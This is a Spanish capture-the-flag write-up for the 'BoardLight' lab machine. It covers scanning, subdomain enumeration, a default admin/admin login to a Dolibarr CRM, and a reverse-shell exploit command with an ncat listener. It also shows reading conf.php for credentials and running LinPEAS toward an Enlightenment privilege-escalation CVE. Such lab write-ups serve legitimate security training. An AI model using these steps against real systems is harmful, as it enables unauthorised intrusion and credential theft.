BoardLight

Last updated 3 months ago

Was this helpful?

BoardLight

✍️ Autor: cY83rR0H1t 🔍 Dificultad: Fácil 📅 Fecha de creación: 25/05/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 10.10.11.11

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sC -sV 10.10.11.11

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 10.10.11.11

para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web nos salga una página de una consultoría de ciberseguridad.

Inspeccionamos el código fuente y no vemos nada relevante.

Ahora buscaremos directorios con la herramienta Gobuster a través de:

gobuster vhost --domain board.htb -u http://10.10.11.11 \
    -w /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt \ 
    --append-domain

Hemos descubierto un subdominio por lo que editamos el fichero /etc/hosts con el subdominio y la IP.

Con la herramienta Wfuzz vemos los directorios y archivos que contiene la página.

Nos llama la atención el archivo index.php por lo que realizamos la búsqueda.

http://crm.board.htb/index.php

Es un panel de login por lo que probamos las credenciales más comunes. Probamos admin tanto para contraseña y usuario y nos deja iniciar sesión correctamente.

🚀 EXPLOTACIÓN

Revisamos la versión por Internet si tiene alguna vulnerabilidad. Efectivamente tiene una vulnerabilidad que intentaremos explotar haciendo una Reverse Shell.

Ejecutamos el script mientras nos ponemos en escucha para conectarnos.

python3 exploit.py http://crm.board.htb admin admin 10.10.16.13 9001

ncat -l -p 9001

En esta etapa, tras obtener la shell en la máquina objetivo, descubrimos que el flag no se encuentra en esta máquina en particular. En cambio, el objetivo ahora es buscar las credenciales del otro usuario en esta misma máquina que indagando por documentaciones de Dolibarr se llama Larissa.

Mostramos el contenido del archivo conf.php

Hemos descubierto las credenciales por lo que nos conectamos a través del serivicio SSH.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar pero nos pide contraseña.

Listamos el contenido que tiene el usuario y descubrimos la flag del usuario.

Primero, busqué el código del script en GitHub, lo copié y lo guardé en un archivo llamado linpeas.sh en el directorio del usuario Larissa. Para hacer esto, utilicé el editor nano con el siguiente comando:

nano linpeas.sh

Dentro de este archivo, pegué todo el código obtenido de GitHub y lo guardé. Sin embargo, para ejecutar el script, necesitamos otorgarle permisos de ejecución, lo cual se hace con el siguiente comando:

chmod +x linpeas.sh

Luego de esto ejecutamos el script de la siguiente manera:

bash linpeas.sh

Esperamos a que el script termine su ejecución. Una vez completado, revisamos los archivos de interés. LinPEAS realiza un escaneo exhaustivo del sistema para identificar archivos y configuraciones que podrían presentar vulnerabilidades para la escalada de privilegios.

Entre los archivos más relevantes o recurrentes se encuentran los relacionados con Enlightenment. Tras investigar, descubrimos que la versión 0.23 de Enlightenment tiene una vulnerabilidad identificada con el código [CVE-2022–37706]. Además, encontramos que existe un exploit disponible para explotar esta vulnerabilidad que coincide con el exploit que tiene Larissa.